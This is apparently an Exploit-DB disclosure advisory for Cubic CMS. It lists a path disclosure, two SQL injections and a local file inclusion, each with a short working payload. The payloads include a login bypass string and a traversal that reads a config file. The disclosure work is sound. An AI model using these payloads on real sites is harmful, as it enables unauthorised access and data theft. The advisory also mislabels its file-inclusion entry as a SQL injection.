Cubic CMS - Multiple Vulnerabilities

EDB-ID:

30790




Platform:

PHP

Date:

2014-01-07


I. BACKGROUND
-------------------------
"CUBIC CMS" is a non-free content management system for websites and 
portals of any size, powerful, adaptable to any graphic design that 
allows users administration 100% professional but simple at the same 
time that website.

II. VULNERABILITIES
-------------------------

II.i FULL PATH DISCLOSURE
-------------------------
CUBIC CMS presents a full path disclosure in the 'Controller Not Found' 
exception management, due to an incorrect 'Software Exception' management.

Syntax: 
  http://www.example.com/id/-22
  http://www.example.com/foo.bar

II.ii SQL Injection
-------------------------
CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters 
on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP 
Method, due to an insufficient sanitization on user supplied data.

Syntax:  
  http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
  http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -

II.iii SQL Injection
-------------------------
CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his 
'/login.usuario' (Users Management Module) script via POST HTTP Method, due to an 
insufficient sanitization on user supplied data.

Syntax:  
  login=Administrator&pass=foobar') or ('1'='1

II.iv Local File Inclusion
-------------------------
CUBIC CMS presents a SQL Injection in its 'path' parameter on his 
'/recursos/agent.php' (Resources Management Module) script via GET HTTP Method, 
due to an insufficient sanitization on user supplied data.

Syntax:  
  http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini

IV. REFERENCES
-------------------------
http://www.proyectosbds.com
http://www.cubicfactory.com/

V. DISCLOSURE TIMELINE
-------------------------
- March 28, 2012: First Vendor Contact.
- Dec 30, 2013: Second Vendor Contact (Still waiting for responses).

VI. CREDITS
-------------------------
This vulnerability has been discovered
by Eugenio Delfa <ed (at) isbox (dot) org>.